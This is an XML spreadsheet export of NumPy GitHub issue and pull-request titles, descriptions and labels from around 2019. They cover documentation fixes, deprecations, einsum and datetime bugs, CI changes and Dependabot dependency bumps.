    <t>Intended to be backported to 1.16.x and 1.17.x - at the very least, the first two commits, but doing the whole patch-set is probably fine too._x000D_
_x000D_
Brought on by noticing some mistakes in gh-13847 that we'd ideally detect at build time.</t>
  </si>
  <si>
    <t>MAINT,BUG,DOC: Fix errors in _add_newdocs</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', '04 - Documentation', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Reverts numpy/numpy#13876._x000D_
_x000D_
Doing this so that I can reapply it without a squash commit, which will result in the github page at b592e8f34ef750579b752c590338b3f7cbe92939 showing `master` as one of the branches this fix is present in._x000D_
_x000D_
This only works if done as two separate PRs.</t>
  </si>
  <si>
    <t>MAINT: Revert #13876, "MAINT,BUG,DOC: Fix errors in _add_newdocs"</t>
  </si>
  <si>
    <t>[The 1.17 docs](https://www.numpy.org/devdocs/reference/random/index.html) say:_x000D_
_x000D_
&gt; Generator can be used as a direct replacement for RandomState, although the random values are generated by PCG64._x000D_
_x000D_
Based on this, I tried (effectively, in my code base) to replace the second line here with the third, but it does not work:_x000D_
```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.random.RandomState(0).randn(1)_x000D_
array([1.76405235])_x000D_
&gt;&gt;&gt; np.random.Generator(np.random.PCG64()).randn(1)_x000D_
AttributeError: 'numpy.random.generator.Generator' object has no attribute 'randn'_x000D_
```_x000D_
The same thing happens with the `default_rng` method._x000D_
_x000D_
Is it an oversight that `randn` is not included? If not (i.e., if it's intentional), then it should probably not say in the docs that it is a direct replacement, because the pubilc API is not identical._x000D_
_x000D_
FWIW this was the first method I tried. If direct replacement / identical API is desired, it's probably worth at least having a short `set`-based test for at public method / callable equivalence. I can write this if it's helpful, but it's probably better if someone involved in the `random` module added any missing methods.</t>
  </si>
  <si>
    <t>DOC: Generator not direct replacement for RandomState, missing randn</t>
  </si>
  <si>
    <t>['component: Documentation', 'component: numpy.random']</t>
  </si>
  <si>
    <t>Continuation of the maintenance part of #13876</t>
  </si>
  <si>
    <t xml:space="preserve"> MAINT: Warn if `_add_newdocs.py` is used to add docstrings to pure-python objects</t>
  </si>
  <si>
    <t>Backports #13876_x000D_
_x000D_
Preference would be to not squash-merge these, so that the same commit is shared across the 1.16 and 1.17 branches</t>
  </si>
  <si>
    <t xml:space="preserve">MAINT/BUG/DOC: Fix errors in _add_newdocs </t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', '08 - Backport', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Added checks to array.nonzero to ensure GIL is not released if it is needed. _x000D_
_x000D_
In reference to #13753._x000D_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</si>
  <si>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incorrect GIL release in array.nonzero</t>
  </si>
  <si>
    <t>In astropy, we're [getting loads of `DeprecationWarning`](https://github.com/astropy/astropy/issues/8935) about possibly writing to a broadcast array from cythonized code. They all seem false positives, and may rather reflect something in `Cython` which I do not understand. But it can be reproduced with this trivial code below. For our particular case, I think this could be solved if one ensured the warning flag was only set if there was actual memory overlap inside the broadcast array._x000D_
_x000D_
Sample file `broadcast.pyx`_x000D_
```_x000D_
import warnings_x000D_
warnings.filterwarnings('error')_x000D_
_x000D_
import numpy as np_x000D_
cimport numpy as np_x000D_
_x000D_
_x000D_
t, _ = np.broadcast_arrays(np.ones(10), np.array(1.))_x000D_
_x000D_
# Real code also has the following to ensure that broadcast arrays are copied._x000D_
# But that does not make a difference for the error, since the strides of `t` are fine._x000D_
# t = np.asarray(t, order='C')_x000D_
_x000D_
ctypedef np.float64_t DTYPE_t_x000D_
_x000D_
_x000D_
cdef check(DTYPE_t[::1] t):_x000D_
    pass_x000D_
_x000D_
_x000D_
print(t.strides)_x000D_
check(t)_x000D_
```_x000D_
_x000D_
Corresponding `setup.py`:_x000D_
```_x000D_
from distutils.core import setup_x000D_
from Cython.Build import cythonize_x000D_
_x000D_
setup(_x000D_
    ext_modules = cythonize("broadcast.pyx")_x000D_
)_x000D_
```_x000D_
_x000D_
Compile and run with:_x000D_
```_x000D_
python3 setup.py build_ext --inplace_x000D_
python3 -c 'import broadcast'_x000D_
```</t>
  </si>
  <si>
    <t>False positives for warning about writing to broadcast array in cython code</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.core', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>To document the fill_value parameter (see  #2703) it's needed to display the correct docstring of the function instead of overwriting it with the docstring of ndarray.view.</t>
  </si>
  <si>
    <t>DOC: Don't override MaskedArray.view documentation with the one from ndarray.view</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>The descriptors on [PyPI](https://pypi.org/project/numpy/) are missing Python 3.8</t>
  </si>
  <si>
    <t>BLD: declare support for python 3.8</t>
  </si>
  <si>
    <t>DOC: Update README.md</t>
  </si>
  <si>
    <t>DOC: Change from HTTP to HTTPS</t>
  </si>
  <si>
    <t xml:space="preserve">The original version doesn't render correctly; see, for example,_x000D_
https://numpy.org/devdocs/reference/generated/numpy.mirr.html#numpy.mirr_x000D_
_x000D_
The HTML output for the updated markup looks much better._x000D_
</t>
  </si>
  <si>
    <t>DOC: lib: Fix deprecation markup in financial function docstrings.</t>
  </si>
  <si>
    <t>This has been on the Not-Done list for a while. We can accept NEP 29 (phasing out old python/numpy version support) and thus marking it as Final.</t>
  </si>
  <si>
    <t>NEP: Accept NEP 29 as final</t>
  </si>
  <si>
    <t>['component: NEP']</t>
  </si>
  <si>
    <t xml:space="preserve">- Create 1.17.3-changelog.rst_x000D_
- Create 1.17.3-notes.rst_x000D_
- Update release.rst_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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Post 1.17.3 release update.</t>
  </si>
  <si>
    <t xml:space="preserve">The error message that results when attempting to subtract bool arrays_x000D_
is changed to say that the operation is "not supported", rather than_x000D_
"is deprecated".  This is now consistent with a similar error message_x000D_
from the negative unary operator._x000D_
</t>
  </si>
  <si>
    <t>MAINT: umath: Change error message for unsupported bool subtraction.</t>
  </si>
  <si>
    <t xml:space="preserve">This PR is to close #5406. I haven't read the text yet, I assume it  may also need some modification, especially as the warnings come up in another example in L433, too. At  that part we might want to catch them?_x000D_
_x000D_
Also, as already said in #14707, these narrative docs are not included in the doctest runs.  I cannot yet fix the machinery that they got tested, though I got as far as doctest picks them up._x000D_
_x000D_
This also closes https://github.com/numpy/numpy/issues/7117_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: cleaning up examples in maskedarray.generic</t>
  </si>
  <si>
    <t>As per NEP-32, the financial functions are deprecated.</t>
  </si>
  <si>
    <t>DEP: deprecate financial functions.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '07 - Deprecation', 'component: numpy.lib.financial']</t>
  </si>
  <si>
    <t>&lt;!--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Fix #12797._x000D_
_x000D_
As discussed, we want argmin/argmax/min/max to return `NaT` when it exists in the array._x000D_
_x000D_
I modified some previous test cases that ignores `NaT`. I also combined the `DATETIME_argmin` function with more general `argmin` function. So that it is consistent with `argmax`.</t>
  </si>
  <si>
    <t>API: NaT (arg)min/max behavior</t>
  </si>
  <si>
    <t>['30 - API']</t>
  </si>
  <si>
    <t>Before this change, it would confusingly default to NaT, which was not useful._x000D_
_x000D_
Fixes gh-14713</t>
  </si>
  <si>
    <t>BUG: Default start to 0 for timedelta arange</t>
  </si>
  <si>
    <t>['component: numpy.datetime64']</t>
  </si>
  <si>
    <t>This error is a weird one_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.arange(12, dtype='m8[M]')_x000D_
ValueError: arange: cannot use NaT (not-a-time) datetime values_x000D_
```</t>
  </si>
  <si>
    <t>arange on timedelta gives a weird error</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.datetime64']</t>
  </si>
  <si>
    <t xml:space="preserve">Appveyor is not used any more, no point in keeping the config file around in master._x000D_
_x000D_
There are still mentions of it as part of the release procedure, where I feel some of it could be cleaned out, too, but that narrative file seems to be a little bit outdate anyway, so it's definitely beyond the scope of this PR (and my expertise). </t>
  </si>
  <si>
    <t>DOC:  Removing mentions of appveyor</t>
  </si>
  <si>
    <t>['04 - Documentation', '05 - Testing']</t>
  </si>
  <si>
    <t>This was started in gh-14682 but I missed the path in the override.c_x000D_
(since we parse these things multiple times currently)._x000D_
_x000D_
I am not clear why the test seems to be flaky to be honest..._x000D_
_x000D_
---_x000D_
_x000D_
I would blame silencing of warnings for the flaky tests, but that does not really make sense here/anymore... Maybe a pytest thing really, since after the DeprecationWarning, there would still be an error raised.</t>
  </si>
  <si>
    <t>DEP: Finish the out kwarg deprecation for ufunc calls</t>
  </si>
  <si>
    <t>Noticed while reading. Not part of any thorough review.</t>
  </si>
  <si>
    <t>DOC: Switch Markdown link to RST in NEP 29</t>
  </si>
  <si>
    <t xml:space="preserve">- Create 1.17.3-changelog.rst_x000D_
- Update 1.17.3-notes.rst._x000D_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</si>
  <si>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REL: Prepare for 1.17.3 release.</t>
  </si>
  <si>
    <t>['14 - Release', 'component: Documentation']</t>
  </si>
  <si>
    <t>This is to close https://github.com/numpy/numpy/issues/14697._x000D_
_x000D_
It also closes, if @mhvk agrees, https://github.com/numpy/numpy/issues/12598_x000D_
_x000D_
_x000D_
_x000D_
I've cancelled travis (couldn't do it for the other services though) as there is no point running CI on this. Please do check how the build matrix looks like now:_x000D_
https://travis-ci.org/numpy/numpy/builds/598236555?utm_source=github_status&amp;utm_medium=notification</t>
  </si>
  <si>
    <t>TST: Adding CI stages, with one initial job to the Travis CI</t>
  </si>
  <si>
    <t xml:space="preserve">Solve some of the WARNINGS when building documentation with `SPHINXOPTS=-n make html`. xref gh-13114. Here is how I found and fixed these:_x000D_
_x000D_
```_x000D_
source &lt;path-to-python3-virt&gt;/bin/activate_x000D_
cd doc # into the numpy documentation directory_x000D_
(cd ..; pip install .) # remakes and installs numpy into the virtual environment_x000D_
make clean_x000D_
SPHINXOPTS=-nq make html &amp;2 &gt; 1 |tee /tmp/shpinx_build.html_x000D_
cut -f4-7 -d: /tmp/sphinx_build.txt |sort | uniq -c | sort -n_x000D_
```_x000D_
The last line sorts and prints out the frequency of the WARNINGS. It seems sphinx is limited to about 1000 WARNINGS. We had over that limit, after this PR it is down to about 600._x000D_
_x000D_
In order to detect what the reference **should** be, I use this to search the inverse index of references, i.e for `ndarray.all`:_x000D_
```_x000D_
$ tail -n +5 build/html/objects.inv | zlib-flate -uncompress |grep -i ndarray.all_x000D_
```_x000D_
which prints_x000D_
```_x000D_
numpy.ndarray.all py:method 1 reference/generated/numpy.ndarray.all.html#$ -_x000D_
reference/generated/numpy.ndarray.all std:doc -1 \_x000D_
     reference/generated/numpy.ndarray.all.html numpy.ndarray.all_x000D_
_x000D_
```_x000D_
_x000D_
The first line is the important one: `numpy.ndarray.all` is a `py:method` reference, so using `ndarray.all` is not sufficient, either use the full name or add a `.. currentmodule:: numpy` directive. I chose to add the explicit namespace to many of the "See Also" references since I think it looks better when using console-based `help(numpy.any)` </t>
  </si>
  <si>
    <t>Doc warnings</t>
  </si>
  <si>
    <t xml:space="preserve">Now that Python 3.8.0 is out, I foresee that more and more downstream packages would like to test against it. To help reduce their CI build time, it would be extremely nice to have wheels available on PyPI for at least the latest numpy release._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Build python3.8 wheels for latest releases</t>
  </si>
  <si>
    <t>The current total runtime of Travis is ~2hrs for all the commits, this could be significantly reduced with introducing stages[0], where jobs are run in subsets and in case of failures they don't proceed to the next set. We use stages at astropy for a long time now, and so far no one complained._x000D_
_x000D_
Looking at the latest travis log history[1], numpy has an amazingly green status there, so this may not be a big issue here. However I'm happy to open a PR tomorrow as part of the sprint, if you would be in favour to try this. With the current 14 jobs 2 or maybe 3 stages would the trick perfectly._x000D_
_x000D_
[0] - https://docs.travis-ci.com/user/build-stages/_x000D_
[1] - last week there were only 14 failing builds, 6 of these had all the jobs failing, while for the others I couldn't really see an outlier that failed much more often than the rest (jobs no2 and no6 was slightly above the rest)</t>
  </si>
  <si>
    <t>ENH/TST: use stages in Travis</t>
  </si>
  <si>
    <t>The changes process was mentioned in the workflow subpage but missed here.</t>
  </si>
  <si>
    <t>DOC: Note release notes process changes on devdocs start page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/development_workflow.html_x000D_
--&gt;_x000D_
_x000D_
BUG: fixes #14692 on Power 9 and z/Linux_x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix `np.einsum` errors on Power9 Linux and z/Linux</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'component: numpy.einsum']</t>
  </si>
  <si>
    <t xml:space="preserve">An array index fails on Power9 Linux and z/Linux._x000D_
_x000D_
PR follows this issue, but not sure that x86 will be happy with the proposed fix_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```_x000D_
(qdev_venv) [linux1@jwoehr1 Qiskit]$ python_x000D_
Python 3.6.8 (default, Jun 11 2019, 14:52:20) _x000D_
[GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] on linux_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; tensor = np.random.rand(10, 10, 10, 10)_x000D_
&gt;&gt;&gt; np.einsum('ijij-&gt;', tensor)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "&lt;__array_function__ internals&gt;", line 6, in einsum_x000D_
  File "/home/linux1/work/Qiskit/qdev_venv/lib64/python3.6/site-packages/numpy/core/einsumfunc.py", line 1356, in einsum_x000D_
    return c_einsum(*operands, **kwargs)_x000D_
ValueError: dimensions in operand 0 for collapsing index 'þ' don't match (-1419377904 != 10)_x000D_
&gt;&gt;&gt; _x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "&lt;__array_function__ internals&gt;", line 6, in einsum_x000D_
  File "/home/linux1/work/Qiskit/qdev_venv/lib64/python3.6/site-packages/numpy/core/einsumfunc.py", line 1356, in einsum_x000D_
    return c_einsum(*operands, **kwargs)_x000D_
ValueError: dimensions in operand 0 for collapsing index 'þ' don't match (-1419377904 != 10)_x000D_
```_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
1.17.2 3.6.8 (default, Jun 11 2019, 14:52:20) _x000D_
[GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix np.einsum errors on Power9 Linux and z/Linux.</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '09 - Backport-Candidate']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14605. _x000D_
_x000D_
`PyArray_DescrCheck` was defined incorrectly. Redefine and add `PyArray_DescrCheckExact`._x000D_
_x000D_
This becomes a problem if we allow subclassing `PyArrayDescr_Type`, and should be backported to any version we still support to prevent issues when using a newer NumPy with code compiled with an older NumPy. Searching scipy/pandas/astropy/numba only turned up a use inside numba. Once this is merged we should submit an issue there to work around this for old versions._x000D_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</si>
  <si>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properly define PyArray_DescrCheck</t>
  </si>
  <si>
    <t>This finishes a deprecation started in NumPy 1.10. when the support_x000D_
for providing multiple output arguments was added.</t>
  </si>
  <si>
    <t>DEP: ufunc `out` argument must be a tuple for multiple outputs</t>
  </si>
  <si>
    <t>['03 - Maintenance', '07 - Deprecation', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>This removes boolean loops from subtract and negative ufuncs. The use of these loops is not possible since an error is raised during type resolution. (In my changes for new dtypes the spurious loops were picked up anyway).</t>
  </si>
  <si>
    <t>MAINT: Remove unused boolean negative/subtract loops</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
We have an embedded python using miniconda virtual environment.  Numpy works fine within the embedded python environment.  However, when we use the numpy fft function (np.fft.fft2()), it will crash the application with access violation error due to incorrect (unmatching) version of mkl_intel.thread.dll is used._x000D_
_x000D_
Call stack:_x000D_
 	000000000aa90740()	Unknown_x000D_
 	mkl_intel_thread.dll!00007ffe60773161()	Unknown _x000D_
 	mkl_avx2.dll!00007ffe54b67383()	Unknown_x000D_
 	mkl_rt.dll!00007ffe5df53c0d()	Unknown_x000D_
 	_pydfti.cp37-win_amd64.pyd!00007ffe86dbaaa8()	Unknown_x000D_
 	_pydfti.cp37-win_amd64.pyd!00007ffe86dbcef1()	Unknown_x000D_
 	_pydfti.cp37-win_amd64.pyd!00007ffe86db71d7()	Unknown_x000D_
 	_pydfti.cp37-win_amd64.pyd!00007ffe86db7f48()	Unknown_x000D_
 	python37.dll!cfunction_call_varargs(_object * func, _object * args, _object * kwargs) Line 755	C_x000D_
....._x000D_
_x000D_
Our application (A.exe) also uses a different version of the mkl libarary (2017.0.3.1) where Miniconda numpy uses 2019.0.31 version.  I checked that in process explorer, both versions are loaded into the same process (i.e. A.exe)._x000D_
_x000D_
Our application installs and load the following mkl dlls to our process (i.e. A.exe) :_x000D_
mkl_core.dll_x000D_
mkl_def.dll_x000D_
mkl_intel_thread.dll_x000D_
mkl_mc.dll_x000D_
mkl_mc3.dll_x000D_
mkl_msg.dll_x000D_
_x000D_
_x000D_
In the debugger, I found out that both mkl_rt.dll and mkl_avx2.dll are 2019.0.31 in the call stack of the crash.  But mkl_intel_thread.dll is 2017.0.31.  Since an incorrect vesion of mkl_intel_thread.dll is being called, hence it causes access violation error._x000D_
_x000D_
Here is the code that we execute within the embedded python virtual environment:_x000D_
import numpy as np_x000D_
a = np.mgrid[:5, :5][0]_x000D_
print(a)_x000D_
np.fft.fft2(a)_x000D_
_x000D_
The same code will not cause crash (i.e. access violation error) when I use python (3.7) from https://www.python.org/ since this python does not install the mkl related dll.  It will use the mkl libary install by our application (so only one version of mkl library is used here)._x000D_
_x000D_
Since virtual enviroment from www.python.org python does not work well in embedded, so we have choose to use the miniconda virtual environment.  So, we cannot use python from www.python.org as a solution for my problem here._x000D_
_x000D_
So, I would like to find out if there is a solution to the above problem.  Appreciate your help!_x000D_
_x000D_
_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
As mentioned above_x000D_
_x000D_
### Error message:_x000D_
Access violation (crash)_x000D_
_x000D_
### Numpy/Python version information:_x000D_
Miniconda Python version = 3.7.2150.1013_x000D_
Numpy version = 1.15.4_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>embeded miniconda (virtual environement) numpy fft/mkl_intel_thread.dll  crash issue</t>
  </si>
  <si>
    <t>['29 - Intel/Anaconda']</t>
  </si>
  <si>
    <t xml:space="preserve">When an axis argument was given, shuffle was using the original length of_x000D_
the array instead of the length of the given axis.  This meant that, for_x000D_
example, if an array with shape (2, 10) was shuffled with axis=1, only the_x000D_
first two columns were shuffled._x000D_
</t>
  </si>
  <si>
    <t>BUG: random: Use correct length when axis is given to shuffle.</t>
  </si>
  <si>
    <t xml:space="preserve">### Reproducing code example:_x000D_
```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; a = np.random.uniform(size=(3, 4))_x000D_
&gt;&gt;&gt; where = np.random.uniform(size=(3, 4)) &gt;= 0.5_x000D_
&gt;&gt;&gt; np.sin(a)_x000D_
array([[0.29821273, 0.21740487, 0.01291611, 0.1284391 ],_x000D_
       [0.72737801, 0.32444491, 0.27899213, 0.73718454],_x000D_
       [0.32471309, 0.15702175, 0.39378894, 0.69413136]])_x000D_
&gt;&gt;&gt; np.sin(a, where=where)_x000D_
array([[0.29821273, 0.21740487, 0.01291611, 0.1284391 ],_x000D_
       [0.72737801, 0.32444491, 0.27899213, 0.73718454],_x000D_
       [0.32471309, 0.15702175, 0.39378894, 0.69413136]])_x000D_
&gt;&gt;&gt; out = np.zeros(a.shape)_x000D_
&gt;&gt;&gt; np.sin(a, out=out)_x000D_
array([[0.29821273, 0.21740487, 0.01291611, 0.1284391 ],_x000D_
       [0.72737801, 0.32444491, 0.27899213, 0.73718454],_x000D_
       [0.32471309, 0.15702175, 0.39378894, 0.69413136]])_x000D_
&gt;&gt;&gt; out_x000D_
array([[0.29821273, 0.21740487, 0.01291611, 0.1284391 ],_x000D_
       [0.72737801, 0.32444491, 0.27899213, 0.73718454],_x000D_
       [0.32471309, 0.15702175, 0.39378894, 0.69413136]])_x000D_
&gt;&gt;&gt; out = np.zeros(a.shape)_x000D_
&gt;&gt;&gt; np.sin(a, out=out, where=where)_x000D_
array([[0.        , 0.21740487, 0.01291611, 0.        ],_x000D_
       [0.72737801, 0.32444491, 0.        , 0.        ],_x000D_
       [0.32471309, 0.15702175, 0.39378894, 0.        ]])_x000D_
&gt;&gt;&gt; out_x000D_
array([[0.        , 0.21740487, 0.01291611, 0.        ],_x000D_
       [0.72737801, 0.32444491, 0.        , 0.        ],_x000D_
       [0.32471309, 0.15702175, 0.39378894, 0.        ]])_x000D_
&gt;&gt;&gt; np.sin(a, where=where)_x000D_
array([[0.        , 0.21740487, 0.01291611, 0.        ],_x000D_
       [0.72737801, 0.32444491, 0.        , 0.        ],_x000D_
       [0.32471309, 0.15702175, 0.39378894, 0.        ]])_x000D_
&gt;&gt;&gt; np.sin(a)_x000D_
array([[0.29821273, 0.21740487, 0.01291611, 0.1284391 ],_x000D_
       [0.72737801, 0.32444491, 0.27899213, 0.73718454],_x000D_
       [0.32471309, 0.15702175, 0.39378894, 0.69413136]])_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
```_x000D_
1.17.2 3.6.7 (default, Oct 22 2018, 11:32:17) _x000D_
[GCC 8.2.0]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>Confusing behavior of where in ufuncs</t>
  </si>
  <si>
    <t>This eliminates a lot of duplicate work to handle the difference between C and python modulo._x000D_
_x000D_
`extract_unit` has been moved to the top of the file, but has not otherwise changed._x000D_
_x000D_
Should be no behavior change here.</t>
  </si>
  <si>
    <t>MAINT: Use `extract_unit` throughout datetime</t>
  </si>
  <si>
    <t>Bumps [pytz](https://github.com/stub42/pytz) from 2019.2 to 2019.3.
&lt;details&gt;
&lt;summary&gt;Commits&lt;/summary&gt;
- [`3db1213`](https://github.com/stub42/pytz/commit/3db12139c6da6ae3fb2f6fb4988adc9db14e3838) Bump version numbers to 2019.3/2019c
- [`6870ec1`](https://github.com/stub42/pytz/commit/6870ec1a032a8200cf2557a298b3132c7e1bfc9f) IANA 2019c
- [`5e47a3e`](https://github.com/stub42/pytz/commit/5e47a3ec05c6dbc232fc867cec78ec4568f27c99) Squashed 'tz/' changes from 23a01523a..c5b665d49
- See full diff in [compare view](https://github.com/stub42/pytz/compare/release_2019.2...release_2019.3)
&lt;/details&gt;
&lt;br /&gt;
[![Dependabot compatibility score](https://api.dependabot.com/badges/compatibility_score?dependency-name=pytz&amp;package-manager=pip&amp;previous-version=2019.2&amp;new-version=2019.3)](https://dependabot.com/compatibility-score.html?dependency-name=pytz&amp;package-manager=pip&amp;previous-version=2019.2&amp;new-version=2019.3)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badge me` will comment on this PR with code to add a "Dependabot enabled" badge to your readme
Additionally, you can set the following in the `.dependabot/config.yml` file in this repo:
- Update frequency
- Out-of-range updates (receive only lockfile updates, if desired)
- Security updates (receive only security updates, if desired)
&lt;/details&gt;</t>
  </si>
  <si>
    <t>MAINT: Bump pytz from 2019.2 to 2019.3</t>
  </si>
  <si>
    <t>Bumps [pytest](https://github.com/pytest-dev/pytest) from 5.2.0 to 5.2.1.
&lt;details&gt;
&lt;summary&gt;Release notes&lt;/summary&gt;
*Sourced from [pytest's releases](https://github.com/pytest-dev/pytest/releases).*
&gt; ## 5.2.1
&gt; pytest 5.2.1 (2019-10-06)
&gt; =========================
&gt; 
&gt; Bug Fixes
&gt; ---------
&gt; 
&gt; -   [\#5902](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5902): Fix
&gt;     warnings about deprecated `cmp` attribute in `attrs&gt;=19.2`.
&lt;/details&gt;
&lt;details&gt;
&lt;summary&gt;Changelog&lt;/summary&gt;
*Sourced from [pytest's changelog](https://github.com/pytest-dev/pytest/blob/master/CHANGELOG.rst).*
&gt; pytest 5.2.1 (2019-10-06)
&gt; =========================
&gt; 
&gt; Bug Fixes
&gt; ---------
&gt; 
&gt; -   [\#5902](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5902): Fix warnings about deprecated `cmp` attribute in `attrs&gt;=19.2`.
&lt;/details&gt;
&lt;details&gt;
&lt;summary&gt;Commits&lt;/summary&gt;
- [`12cc729`](https://github.com/pytest-dev/pytest/commit/12cc729f6b50abbd3708dfc64e76ff454852b805) Preparing release version 5.2.1
- [`1c5efff`](https://github.com/pytest-dev/pytest/commit/1c5efffd904e0068a3e7b4090d94bbe589be66bf) Add changelog entry for [#5902](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5902)
- [`8c9ea5e`](https://github.com/pytest-dev/pytest/commit/8c9ea5e055e7ef7a7d33db65c781adee16b55bc0) Fix warnings with attrs 19.2 and fix object assertions ([#5902](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5902))
- [`c58b0fb`](https://github.com/pytest-dev/pytest/commit/c58b0fb4acefefc81a12ab92ad3f37384218ee78) Use ATTRS_EQ_FIELD for attrs 19.2 compat
- [`4011af6`](https://github.com/pytest-dev/pytest/commit/4011af68cd84a69f0b222503eb5f2dc71bdd7e83) Merge pull request [#5910](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5910) from pytest-dev/asottile-patch-1
- [`9637b3e`](https://github.com/pytest-dev/pytest/commit/9637b3e376d6e94c10af5c7132f97fd3cb308125) Fix dynamic scoping changelog link
- [`33c3ec6`](https://github.com/pytest-dev/pytest/commit/33c3ec66b77b8e5b3abbe0a81aafceafec1932ee) Merge pull request [#5898](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5898) from kevinjfoley/doc-typo-fix
- [`a79acf2`](https://github.com/pytest-dev/pytest/commit/a79acf279a80bbbac0a05d8fadf62649753c668a) Fix warnings with attrs 19.2 and fix object assertions
- [`9a4c0b9`](https://github.com/pytest-dev/pytest/commit/9a4c0b991b07dff83896999717545b2b44b38901) Update doc: pytest section in setup.cfg ([#5894](https://github-redirect.dependabot.com/pytest-dev/pytest/issues/5894))
- [`b490f5f`](https://github.com/pytest-dev/pytest/commit/b490f5f97915ebe63666e1a51816f81c43d16267) Fix doc typo
- Additional commits viewable in [compare view](https://github.com/pytest-dev/pytest/compare/5.2.0...5.2.1)
&lt;/details&gt;
&lt;br /&gt;
[![Dependabot compatibility score](https://api.dependabot.com/badges/compatibility_score?dependency-name=pytest&amp;package-manager=pip&amp;previous-version=5.2.0&amp;new-version=5.2.1)](https://dependabot.com/compatibility-score.html?dependency-name=pytest&amp;package-manager=pip&amp;previous-version=5.2.0&amp;new-version=5.2.1)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badge me` will comment on this PR with code to add a "Dependabot enabled" badge to your readme
Additionally, you can set the following in the `.dependabot/config.yml` file in this repo:
- Update frequency
- Out-of-range updates (receive only lockfile updates, if desired)
- Security updates (receive only security updates, if desired)
&lt;/details&gt;</t>
  </si>
  <si>
    <t>MAINT: Bump pytest from 5.2.0 to 5.2.1</t>
  </si>
  <si>
    <t>Bumps [pytest-cov](https://github.com/pytest-dev/pytest-cov) from 2.7.1 to 2.8.1.
&lt;details&gt;
&lt;summary&gt;Changelog&lt;/summary&gt;
*Sourced from [pytest-cov's changelog](https://github.com/pytest-dev/pytest-cov/blob/master/CHANGELOG.rst).*
&gt; 2.8.1 (2019-10-05)
&gt; ==================
&gt; 
&gt; -   Fixed [\#348](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/issues/348) -regression when only certain reports (html or xml) are used then `--cov-fail-under` always fails.
&gt; 
&gt; 2.8.0 (2019-10-04)
&gt; ==================
&gt; 
&gt; -   Fixed `RecursionError` that can occur when using [cleanup\_on\_signal](https://pytest-cov.readthedocs.io/en/latest/subprocess-support.html#if-you-got-custom-signal-handling) or [cleanup\_on\_sigterm](https://pytest-cov.readthedocs.io/en/latest/subprocess-support.html#if-you-got-custom-signal-handling). See: [\#294](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/issues/294). The 2.7.x releases of pytest-cov should be considered broken regarding aforementioned cleanup API.
&gt; -   Added compatibility with future xdist release that deprecates some internals (match pytest-xdist master/worker terminology). Contributed by Thomas Grainger in [\#321](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/321)
&gt; -   Fixed breakage that occurs when multiple reporting options are used. Contributed by Thomas Grainger in [\#338](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/338).
&gt; -   Changed internals to use a stub instead of `os.devnull`. Contributed by Thomas Grainger in [\#332](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/332).
&gt; -   Added support for Coverage 5.0. Contributed by Ned Batchelder in [\#319](https://github-redirect.dependabot.com/pytest-dev/pytest-cov/pull/319).
